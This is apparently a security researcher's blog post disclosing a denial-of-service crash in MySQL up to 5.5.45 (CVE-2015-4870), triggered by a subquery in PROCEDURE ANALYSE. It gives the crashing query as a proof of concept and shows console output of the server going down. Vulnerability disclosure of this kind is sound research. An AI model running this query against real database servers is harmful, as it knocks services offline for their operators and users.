🔐Blog of OsandaSecurity Researching and Reverse Engineering pentesting

This is a crash I found in MySQL versions up to 5.5.45. In the function procedure analyse() I found this crash while passing a sub query.

Syntax:

SELECT * FROM `table_name` PROCEDURE ANALYSE((SELECT*FROM(SELECT 1)x),1)

1	SELECT * FROM `table_name` PROCEDURE ANALYSE((SELECT*FROM(SELECT 1)x),1)

So an Example POC would be:

select * from information_schema.tables procedure analyse((select*from(select 1)x),1);

1	select * from information_schema.tables procedure analyse((select*from(select 1)x),1);

---------------------------------------------------------------------------------------------------------------
mysql> select * from information_schema.tables procedure analyse((select*from(select 1)x),1);
ERROR 2013 (HY000): Lost connection to MySQL server during query
mysql>
mysql> select 1;
ERROR 2006 (HY000): MySQL server has gone away
No connection. Trying to reconnect...
ERROR 2003 (HY000): Can't connect to MySQL server on 'localhost' (10061)
ERROR:
Can't connect to the server

mysql>
---------------------------------------------------------------------------------------------------------------

---------------------------------------------------------------------------------------------------------------

mysql> select * from information_schema.tables procedure analyse((select*from(select 1)x),1);

ERROR 2013 (HY000): Lost connection to MySQL server during query

mysql>

mysql> select 1;

ERROR 2006 (HY000): MySQL server has gone away

No connection. Trying to reconnect...

ERROR 2003 (HY000): Can't connect to MySQL server on 'localhost' (10061)

ERROR:

Can't connect to the server

mysql>

---------------------------------------------------------------------------------------------------------------

(more…)

🔐Blog of Osanda

Security Researching and Reverse Engineering

0day

MySQL DoS in the Procedure Analyse Function – CVE-2015-4870

Wireshark DoS PoC

Share this:

Share this: